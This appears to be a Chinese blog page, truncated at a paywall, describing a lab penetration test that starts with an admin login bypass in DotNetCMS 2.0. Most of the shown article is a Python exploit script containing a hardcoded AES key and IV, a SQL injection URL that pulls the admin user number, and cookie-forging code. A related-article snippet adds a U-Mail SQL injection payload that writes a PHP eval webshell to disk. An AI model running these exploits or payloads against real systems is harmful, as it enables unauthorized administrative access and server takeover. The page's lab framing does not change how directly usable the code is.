从外网至内网渗透过程

最新推荐文章于 2024-06-27 10:40:56 发布
最新推荐文章于 2024-06-27 10:40:56 发布
阅读量2.4k 收藏 16
点赞数 1
文章标签: python
原文链接:http://www.cnblogs.com/guaishoujingling/p/10994049.html
版权

 【实验环境】仅供学习参考

 信息收集

登陆目标网站收集信息

 

通过查看页面源码,发现cms版本信息为:DotNetCMS 2.0通过上网查询可以找到该cms存在的漏洞,并进行复现

 

登录绕过漏洞

网站后台地址:/manage/Index.aspx

1)将代码写入exp.py文件中运行,即可得到cookie

代码如下:

#coding:utf-8import argparseimport urllibimport tracebackimport base64from Crypto.Cipher import AESfrom binascii import b2a_hex, a2b_hex#################################search keyword           ####inurl:/manage/Login.aspx   #################################

KEY = 'Guz(%&hj7x89H$yuBI0456FtmaT5&fvHUFCy76*h%(HilJ$lhj!y6&(*jkP87jH7'

IV = 'E4ghj*Ghg7!rNIfb&95GUY86GfghUb#er57HBh(u%g6HJ($jhWk7&!hg4ui%$hjk'def parse_args():

  parser = argparse.ArgumentParser()

  parser.add_argument("-u", "--url", help="the url", required=True, nargs="+")

  return parser.parse_args()def run(url):

  try:

      usernumber = get_usernumber(url)

      if usernumber is not None:

          encrypt_cookie = generate_cookie(usernumber)

          #写入cookie

          write_cookie(url, encrypt_cookie)

  except Exception:

      traceback.print_exc()def get_usernumber(url):

  fullurl = url + "/user/City_ajax.aspx?CityId=1' union all select UserNum,UserNum from dbo.fs_sys_User where UserName='admin"

  content = urllib.urlopen(fullurl).read()

  index = content.index("<option value=\"")

  if  index != -1:

      usernumber = content[index+15:]

      usernumber = usernumber[0: content.index("\"")+1]

      print "Get usernumber success. Usernumber is :", usernumber

      return usernumber

  else:

      print "Get usernumber fail"

      return Nonedef pkcs7padding(data):

  bs = AES.block_size

  padding = bs - len(data) % bs

  padding_text = chr(padding) * padding

  return data + padding_textdef generate_cookie(usernumber):

  orgstr = "%s,admin,0

最低0.47元/天 解锁文章
weixin_30507481
关注
  • 1
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透系列:外网渗透内网穿透(超详细)
weixin_54626591的博客
12-07 915
外网渗透内网穿透(超详细)
电脑教程内网渗透之内网穿透.rar
10-25
5. **端口转发**:通过路由器的配置,将外网请求转发到内网特定设备的端口。这需要对路由器的设置有一定的了解,包括静态端口映射和动态端口映射。 6. **DDNS(动态域名解析服务)**:结合NAT穿透,为动态IP的内网...
渗透测试实战 - 外网渗透内网穿透(超详细)
HAKUNAMATATATTA的博客
02-18 7491
渗透测试实验,外网渗透和内网穿透的详细操作过程以及内网代理和内网探测的方法
把手教你如何进行内网渗透
最新发布
cc123489ll的博客
06-27 707
内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。实操部分写的比较草率,主要是为了增强认知、扩展思路、扩充知识面。实际上有很多优秀的集成化工具,很少会拆分开来单独使用这些方法。
第51篇:某运营商外网打点到内网横向渗透的全过程
ABC_123的博客
02-11 1万+
Part1 前言大家好,我是ABC_123,不知不觉,我一个人已经连续写了51篇原创文章了。本期复盘一次之前做过的某运营商的外网打点到内网横向过程,由于是好多年前的了,很多细节记不清了,但是关键步骤还记得。这次渗透过程的特点是内网很大,打到了域控及核心数据库区,但是却没用到什么高深技术,用的都是常规手段,经验很重要。接下来就把完整过程分享给大家,希望对大家有一些帮助。欢迎关注我的公众号"ABC...
外网打点到渗透内网域控 NASA
qq_53742230的博客
08-26 2794
本次项目是一个是模拟渗透测试 电信诈骗网站(我与诈骗不共戴天),境外人员依赖该网站通过优惠卷诱导受害者进行消费,诈骗受害人金钱。在做项目的时候我们可以把我们学到的知识串联起来,并且在做项目的时候我们会遇到各种各样的问题不会像打靶场那样顺利。遇到这些问题我们要试着去解决它,说不定哪天就可能会遇到同样的问题。没有人一出生就是大佬,无非是见的多了就懂了。希望各位能保持一开始的热情,我们顶峰相见。...
U-Mail邮件系统多重措施保障用户信息安全 防范邮件泄密
U-Mail邮件服务器软件
06-12 914
U-Mail邮件系统提供基于AES加密的邮件加密技术,对邮件数据进行先加密后传输,避免在传输过程中被监听或截取,采用国际标准的SMTP/SSL、POP3/SSL、S/MIME安全邮件协议,在邮件认证、邮件发送(SMTP)和邮件接收(POP3)所有环节上都高位加密,防止网络侦听,同时采用ECC加密算法对存储在磁盘上的邮件文件进行加密,全方位杜绝邮件在收发及存储等环节引发的邮件数据泄露。据调查,被泄露的文件包括网络安全、通信和边境监测数据,以及关于情报和卫星监测系统的敏感信息等。
【渗透资源】 内网渗透指南
03-03
在进行内网渗透之前,信息收集是至关重要的一个步骤。信息收集分为多个阶段,首先是主机发现,目标是识别内网中存活的主机IP地址。这可以通过运行端口扫描和漏洞扫描工具来实现,比如使用nmap、masscan等工具来获取...
内网渗透讲义
03-22
### 内网渗透讲义知识点解析 #### 0x00 概述 - **内网定义**: 内网指的是局域网(Local Area Network, LAN),由多台计算机通过网络互连而成,覆盖范围通常在几千米以内。它可以提供文件管理、应用软件共享、打印机...
内网渗透之常见命令
03-14
内网渗透之常见命令,详细列数了渗透的过程中所用到的所有技术,命令
渗透测试 _ 内网信息收集1
08-03
收集本机信息是信息收集的第一步,无论在外网还是内网,都至关重要。一旦控制了一台机器,需要获取的信息包括: - **系统和权限**:操作系统版本、权限级别等。 - **内网配置**:IP地址段、网络配置、是否在域内。 ...
文件上传漏洞
newlife1441的博客
08-14 1574
trim()作用:从一个字符串的两端删除空白字符deldot()作用:从字符串的尾部开始,从后向前删除点.,直到该字符串的末尾字符不是.为止strrchr()作用:查找字符串在另一个字符串中最后一次出现strtolower()作用:转换大小写str_ireplace()作用:字符串替换操作,不区分大小写。......
外网到内网的渗透(转)
weixin_30897079的博客
05-22 225
内网渗透的思想是源于特洛伊木马的思想---堡垒最容易从内部攻破,一个大型的网站,一个大型的公司,一个大型的目标,在外肉,管理员总会千方百计的加强防范和修补漏洞,常规的方法进去几乎是不可能。   内网渗透的突破口是我们如何得到一个内网的个人机或是内网的服务器,我个人的经验有三种,一是从外网分站渗透到内网,二是发木马信得到内网机器,三是利用取得信任得到内网机器。   一、从外网分站渗透到内网  ...
如何从外网穿透到内网
凌晨五更寒的博客
11-22 2万+
内网,也叫局域网。从范围上来讲,内网就是小部分的网络。如,最小最简单的内网就是二台电脑用网线连接起来,就是一个内网。一般的特定环境,都是内网,如学校的校园网;公司单位的局域网等。
大部分政府网站U-mail存在直接拿shell漏洞
weixin_34355559的博客
10-01 458
大部分网站政府网站U-mail存在直接拿shell漏洞加入webmail/userapply.php?execadd=333&DomainID=111直接爆出物理地址 然后将 aa' union select 1,2,3,4,5,6,'<?php eval($_POST1);?>',8,9,10,11,12,13,14 into outfile 'D:/umail/Wor...
Kali使用Metasploit内、外网渗透windows系统
热门推荐
QQ670663的博客
02-17 2万+
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。 一、(内网渗透)内网英文缩写WAN;内网又称局域网 局域网的覆盖范围一般是方圆几千米之内,其具备的安装便捷、成本节约、扩展方便等特点使其在各类办公室内运用广泛。局域网可以实现文件管理、应用软件共享、打印机共享等功能,在使用过程当中,通过维护局域网网...
模拟实战从外网打点渗透到内网域控的笔记
qq_56426046的博客
12-11 1355
在docker如果启动的时候 --privileged=true 是 可以逃逸的。这次模拟实战的项目几乎是第一次做这么完整的项目从外网渗透到内网域控,这次渗透过程中学到了很多东西,但很多也是我应该熟练使用的。然后通过任意文件写入getshell,因为重装信息会写到config.php,也就 给了我写马的机会.工具地址:https://github.com/Ridter/noPac。设置 kali 的 /etc/proxychains4.conf 文件。利用任意文件删除漏洞删除install.lock文件。
外网访问内网(内网穿透)
weixin_45203607的博客
05-19 1万+
什么是内网穿透 内网穿透,即NAT穿透,网络连接时术语,计算机是局域网内时,外网与内网的计算机节点需要连接通信,有时就会出现不支持内网穿透。就是说映射端口,能让外网的电脑找到处于内网的电脑,提高下载速度。不管是内网穿透还是其他类型的网络穿透,都是网络穿透的统一方法来研究和解决。 非学术的说法: 通常个人电脑无论是连接WIFI上网还是用网线上网,都是属于局域网里边的,外网无法直接访问到你的电脑,内网穿透可以让你的局域网中的电脑实现外网访问功能,全国都能访问 内网穿透有什么用? 通过内网穿透可以实现通过外网
工控攻防演示-从外网到内网设备的入侵
曲终人散
08-06 2629
· 一、 概述 1. 实验目的 通过工控靶场学习web渗透、内网渗透、工控安全相关知识技能。 2. 靶场信息 本实验通过vmware 搭建了靶场的外网和内网环境,在内网环境中,可以连接到真实的PLC进行漏洞利用。 靶场网络拓扑如下: 该网络环境中,有两台攻击机处于模拟外网中,分别是一台 windows7 主机和 kali 主机,通过这两台主机进行漏洞利用,获取内网访问权限,进一步获取西门子PLC的控制权,从而控制城市沙盘。 二、 演示过程 1. 资产发现 登录 kali 攻击机,输入 ifconfig 查
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值